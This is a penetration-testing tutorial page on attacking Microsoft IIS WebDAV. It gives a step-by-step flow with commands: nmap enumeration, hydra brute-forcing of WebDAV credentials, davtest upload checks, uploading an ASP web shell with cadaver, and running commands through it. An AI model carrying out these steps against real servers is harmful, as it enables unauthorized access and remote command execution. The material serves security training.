🧨Exploiting Microsoft IIS WebDAV

What is Microsoft IIS ?

  • IIS (Internet Information Services) is a proprietary extensible web server software developed by Microsoft for use with the Windows NT family.

  • It can be used to host websites/web apps and provides administrators with a robust GUI for managing websites.

  • IIS can be used to host both static and dynamic web pages developed in ASP.NET and PHP.

  • Typically configured to run on ports 80/443.

  • Supported executable file extensions:

    • .asp

    • .aspx

    • .config

    • .php

What is WebDAV?

  • WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers.

  • WebDAV essentially enables a web server to function as a file server for collaborative authoring.

  • WebDAV runs on top Microsoft IIS on ports 80/443.

  • In order to connect to a WebDAV server, you will need to provide legitimate credentials. This is because WebDAV implements authentication in the form of a username and password.

WebDAV Exploitation

  • The first step of the exploitation process will involve identifying whether WebDAV has been configured to run on the IIS web server.

  • We can perform a brute-force attack on the WebDAV server in order to identify legitimate credentials that we can use for authentication.

  • After obtaining legitimate credentials, we can authenticate with the WebDAV server and upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target.

Tools for Exploitation

  • davtest- Used to scan, authenticate and exploit a WebDAV server.

  • cadaver - Cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.

Attack Flow for the Microsoft IIS WebDAV Server

1. Identify the Target Using Nmap

Objective: Determine if the target web application is running Microsoft IIS WebDAV.

Command:

nmap -sC --script=http-enum <target>

Explanation:

  • -sC: Use default scripts.

  • --script=http-enum: Specifically use the HTTP enumeration script to gather detailed information about the web server and its directories.

2. Brute Force Authentication Using Hydra

Objective: Perform a brute force attack on the /webdav/ folder to gain authentication credentials.

Command:

hydra -l <user> -P <password_list> <target> http-get /webdav/

Explanation:

  • -l: Specifies the username.

  • -P: Specifies the password list.

  • http-get: Specifies the HTTP method and path to target.

3. Validate Upload Capabilities with Davtest

Objective: Confirm which file extensions can be uploaded and executed on the WebDAV server.

Command:

davtest -auth <user>:<pass> -url http://<target>/webdav

Explanation:

  • -auth: Specifies the authentication credentials.

  • -url: Specifies the URL of the WebDAV directory.

4. Upload a Shell Using Cadaver

Objective: Use Cadaver to upload a web shell to the server.

Command:

cadaver http://<target>/webdav

Procedure:

  1. Run the command to start Cadaver.

  2. When prompted, enter the username and password obtained from the brute force attack.

  3. At the dav:/webdav/> prompt, use the following command to upload the shell:

    put /usr/share/webshells/asp/webshell.asp

Explanation:

  • cadaver: Command-line WebDAV client.

  • put: Uploads the specified file to the WebDAV directory.

5. Access the Web Shell

Objective: Gain a GUI-based shell access to the server.

Steps:

  1. Navigate to the uploaded shell in your browser:

    http://<target>/webdav/webshell.asp

  2. Use the web shell interface to execute commands on the server.

Hacker's Mantra:Should we fear hackers? Intention is at the heart of this discussion. - Kevin Mitnick

PreviousExploiting Windows VulnerabilitiesNextExploiting WebDAV With Metasploit

Last updated